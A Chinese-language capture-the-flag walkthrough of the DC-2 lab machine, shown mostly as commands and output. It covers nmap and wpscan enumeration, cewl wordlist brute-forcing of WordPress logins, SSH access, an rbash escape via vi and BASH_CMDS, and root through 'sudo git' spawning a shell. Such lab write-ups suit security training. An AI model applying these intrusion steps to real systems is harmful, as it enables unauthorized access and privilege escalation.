DC-2靶场

ipconfig
nmap -A 192.168.92.0/24

Nmap scan report for dc-2 (192.168.92.135)
Host is up (0.00068s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-generator: WordPress 4.7.10
|_http-title: DC-2 – Just another WordPress site
MAC Address: 00:0C:29:67:A5:C2 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

nmap -p- 192.168.92.135

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-07 00:33 EST
Nmap scan report for dc-2 (192.168.92.135)
Host is up (0.00066s latency).
Not shown: 65533 closed tcp ports (reset)
PORT     STATE SERVICE
80/tcp   open  http
7744/tcp open  raqmon-pdu
MAC Address: 00:0C:29:67:A5:C2 (VMware)

nmap --script=vuln -p80,7744 192.168.92.135

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-07 00:35 EST
Nmap scan report for dc-2 (192.168.92.135)
Host is up (0.00058s latency).

PORT     STATE SERVICE
80/tcp   open  http
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=dc-2
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://dc-2:80/index.php/what-we-do/%5C%22
|     Form id: search-form-6750e7244cc64
|     Form action: http://dc-2/
|     
|     Path: http://dc-2:80/index.php/our-people/%5C%22
|     Form id: search-form-6750e724c5c81
|_    Form action: http://dc-2/
| http-wordpress-users: 
| Username found: admin
| Username found: tom
| Username found: jerry
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|   /wp-login.php: Possible admin folder
|   /readme.html: Wordpress version: 2 
|   /: WordPress version: 4.7.10
|   /wp-includes/images/rss.png: Wordpress version 2.2 found.
|   /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
|   /wp-includes/images/blank.gif: Wordpress version 2.6 found.
|   /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
|   /wp-login.php: Wordpress login page.
|   /wp-admin/upgrade.php: Wordpress login page.
|_  /readme.html: Interesting, a readme.
7744/tcp open  raqmon-pdu
MAC Address: 00:0C:29:67:A5:C2 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 31.00 seconds

关键：
| http-wordpress-users: 
| Username found: admin
| Username found: tom
| Username found: jerry

访问http://dc-2/没有返回

find / -name hosts
vim /etc/hosts
192.168.92.135  dc-2
访问http://dc-2/

Flag 1:

Your usual wordlists probably won’t work, so instead, maybe you just need to be cewl.
More passwords is always better, but sometimes you just can’t win them all.
Log in as one to see the next flag.
If you can’t find it, log in as another.

Cewl介绍
Cewl是一款采用Ruby开发的应用程序，你可以给它的爬虫指定URL地址和爬取深度，还可以添额外的外部链接，接下来Cewl会给你返回一个字典文件，你可以把字典用到类似John the Ripper这样的密码破解工具中。除此之外，Cewl还提供了命令行工具。
使用：

cewl <url> [options] 

Cewl可以将打印出的字典存储为文件

cewl url -w dict.txt

cewl http://dc-2/  -w  password.txt

目前有用户名：admin，tom，jerry，密码字典

扫描后台：

apt-get install dirsearch

默认方式扫描单个url
dirsearch -u http://dc-2/

使用文件拓展名为php和txt以及js的字典扫描目标
dirsearch -e php,txt,js -u http://dc-2/

[00:42:30] 200 -    1KB - /wp-login.php

http://dc-2/wp-login.php

或者 dirb http://dc-2

Wordpress有一个著名的扫描工具wpscan

wpscan --url http://dc-2/ -e u      //枚举用户名字

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] jerry
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://dc-2/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By:
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] tom
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

vim user.txt

admin
tom
jerry

wpscan --url http://dc-2/ -U user.txt -P password.txt

[!] Valid Combinations Found:
 | Username: jerry, Password: adipiscing
 | Username: tom, Password: parturient

Username: jerry, Password: adipiscing
登录jerry
pages->flag2

Flag 2:

If you can't exploit WordPress and take a shortcut, there is another way.
Hope you found another entry point.

除了80端口还有7744端口
详细扫描7744段口：

nmap -A -p7744 192.168.92.135

PORT     STATE SERVICE VERSION
7744/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey: 
|   1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
|   2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
|   256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_  256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
MAC Address: 00:0C:29:67:A5:C2 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X

7744是ssh端口
Username: jerry, Password: adipiscing
Username: tom, Password: parturient
尝试ssh登录

ssh jerry@192.168.92.135 -p 7744
ssh tom@192.168.92.135 -p 7744

jerry不行，tom登录成功

tom@DC-2:~$ ls

flag3.txt usr

tom@DC-2:~$ cat flag3

-rbash: cat: command not found

-rbash

compgen -c       //查看可以使用的指令

可以用vi或者less

tom@DC-2:~$ less flag3.txt

Poor old Tom is always running after Jerry. Perhaps he should su for all the stress he causes.

下一个flag可能在jerry目录，
vi提权
vi随便打开文件
再下面添加

:set shell=/bin/sh
:shell

$ whoami

/bin/sh: 1: whoami: not found

$ ls

flag3.txt usr

$ cd ..
$ ls

jerry tom

$ cd jerry
$ ls

flag4.txt

$ cat flag4.txt

/bin/sh: 7: cat: not found

$ less flag4.txt

Good to see that you've made it this far - but you're not home yet. 

You still need to get the final flag (the only flag that really counts!!!).  

No hints here - you're on your own now.  :-)

Go on - git outta here!!!!

$ su root
/bin/sh: 10: su: not found
权限还是不是很高

rbash环境变量的提权：

┌──(root㉿kali)-[/home/kali]
└─# ssh tom@192.168.92.135 -p 7744

export -p        //查看环境变量
BASH_CMDS[a]=/bin/sh;a         //把/bin/sh给a
/bin/bash
export PATH=$PATH:/bin/         //添加环境变量
export PATH=$PATH:/usr/bin      //添加环境变量

发现还是进不去root目录
查找所有SUID集文件
find / -perm -u=s -type f 2>/dev/null

tom@DC-2:/$ find / -perm -u=s -type f 2>/dev/null

/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/sudo
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/procmail
/usr/bin/at
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/sbin/exim4
/bin/umount
/bin/mount
/bin/su

可以使用su
尝试一下jerry用户
Username: jerry, Password: adipiscing

su jerry

sudo -l   显示出自己（执行 sudo 的使用者）的权限

Matching Defaults entries for jerry on DC-2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jerry may run the following commands on DC-2:
    (root) NOPASSWD: /usr/bin/git

git提权

sudo git -p help config
!/bin/sh

sudo -l

Matching Defaults entries for root on DC-2:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User root may run the following commands on DC-2:
    (ALL : ALL) ALL

whoami

root

sudo -i

root@DC-2:~# ls

final-flag.txt

root@DC-2:~# cat final-flag.txt 

__    __     _ _       _                    _

/ / /\ \ \___| | |   __| | ___  _ __   ___  / \
\ \/  \/ / _ \ | |  / _` |/ _ \| '_ \ / _ \/  /
 \  /\  /  __/ | | | (_| | (_) | | | |  __/\_/ 
  \/  \/ \___|_|_|  \__,_|\___/|_| |_|\___\/   


Congratulatons!!!

A special thanks to all those who sent me tweets
and provided me with feedback - it's all greatly
appreciated.

If you enjoyed this CTF, send me a tweet via @DCAU7.